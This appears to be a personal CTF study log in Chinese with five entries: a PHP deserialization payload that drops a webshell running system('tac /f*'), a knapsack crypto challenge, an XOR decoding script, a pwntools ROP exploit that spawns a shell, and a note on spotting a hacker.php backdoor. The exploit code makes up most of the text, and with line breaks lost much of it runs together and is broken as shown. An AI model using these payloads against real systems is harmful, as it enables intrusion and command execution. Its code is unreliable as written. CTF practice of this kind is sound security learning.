1
绕过wakeup,sleep
$u,$p
code=$u.$p
<?php
class ctfshowvip
{public $username;public $password;public $code;public function __construct($u, $p){$this->username = $u;$this->password = $p;}
}
$c = new ctfshowvip('877.php',"<?php system('tac /f*');?>");
echo serialize($c);2
私钥由公钥产生
from Crypto.Util.number import *
import random
from secret import flagdef GET_KEY(n):sum=2key=[1]for i in range(n):r=random.randint(0,1)x=sum+random.randint(0,n)*rkey.append(x)sum+=xreturn keydef enc(m,k):cipher_list = []for i in range(len(m)):if m[i] == 1:cipher_list.append(m[i] * k[i])cipher = sum(cipher_list)return cipherm=bytes_to_long(flag)
m = [int(bit) for byte in flag for bit in format(byte, '08b')]
key=GET_KEY(len(m))
c=enc(m,key)with open('output.txt', 'w') as f:f.write(str(c))f.write(str(key))3
攻防世界666
封装函数,双击追踪flag
strcmp追踪flag encode以后的字符
a2="izwhroz\"\"w\"v.K\".Ni"
key=18
v3=""
flag=""#操作,但长度不变的for i in range(0,18,3):v3=a2[i]flag+=chr((ord(v3)^key) - 6)v3=a2[i+1]flag+=chr((ord(v3)^key) +6)v3=a2[i+2]flag+=chr((ord(v3)^key)^6)
#三个一组,1,2,3
4
from pwn import *
context.arch="amd64"io =process("./rop")
elf=ELF("./rop")#全局搜索函数
system_addr=elf.sym["system"]sh_addr=next(elf.search(b"sh\x00"))#asm
pop_rdi_ret=next(elf.search(asm("pop rdi; ret")))
#获得含有return的地址
ret_addr=next(elf.search(asm("ret")))payload = b"b"*(0x20+0x8)+p64(ret_addr)
payload+=p64(pop_rdi_ret)+p64(sh_addr)+p64(system_addr)io.sendline(payload)
io.interactive()
5
“找出攻击者的IP”
http协议中,
可疑:POST了hacker.php,追踪hacker.php,url解码,确认是开了个后门
 --学习记录1)